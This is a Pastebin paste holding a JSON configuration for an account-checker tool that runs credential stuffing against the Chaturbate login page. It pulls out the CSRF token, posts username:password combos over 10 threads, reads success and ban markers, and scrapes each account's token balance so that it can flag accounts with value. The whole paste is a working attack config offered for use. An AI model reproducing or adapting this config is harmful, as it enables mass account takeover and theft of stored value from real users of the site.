Guest User

Untitled

a guest
Feb 9th, 2018
712
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.32 KB | None | 0 0
  1. {
  2. "General": {
  3. "name": "Chaturbate",
  4. "proxyType": "Proxyless",
  5. "comboType": "Username:Password",
  6. "threads": 10
  7. },
  8. "Requests": [
  9. {
  10. "actionUrl": "https://en.chaturbate.com/auth/login/",
  11. "method": "GET",
  12. "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
  13. "contentType": "",
  14. "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
  15. "referer": "",
  16. "successKeys": [
  17. "Forgot password?"
  18. ],
  19. "variables": [
  20. {
  21. "name": "csrf",
  22. "type": "Regex",
  23. "pattern": "name='csrfmiddlewaretoken' value='([^']*)",
  24. "usedFor": "postData"
  25. }
  26. ]
  27. },
  28. {
  29. "actionUrl": "https://en.chaturbate.com/auth/login/",
  30. "method": "POST",
  31. "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
  32. "contentType": "application/x-www-form-urlencoded",
  33. "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
  34. "referer": "https://en.chaturbate.com/auth/login/",
  35. "postData": 'next=&csrfmiddlewaretoken=+csrf+&username=<USER>&password=<PASS>',
  36. "successKeys": [
  37. "LOG OUT"
  38. ],
  39. "failureKeys": [
  40. "Please correct the errors below.",
  41. "<title>Account Banned - Chaturbate</title>"
  42. ]
  43. },
  44. {
  45. "actionUrl": "https://en.chaturbate.com/",
  46. "method": "GET",
  47. "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
  48. "contentType": "",
  49. "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
  50. "referer": "https://en.chaturbate.com/auth/login/?next=/",
  51. "successKeys": [
  52. 'You have:'
  53. ],
  54. "failureKeys": [
  55. "Forgot password?",
  56. "span class='tokencount'>0<",
  57. "span class='tokencount'>-"
  58. ],
  59. "captureParse": {
  60. "patterns": [
  61. {
  62. "pattern": "span class='tokencount'>([^<]*)<",
  63. "returnString": "+1+ Tokens"
  64. }
  65. ]
  66. }
  67. }
  68. ]
  69. }
Advertisement
Add Comment
Please, Sign In to add comment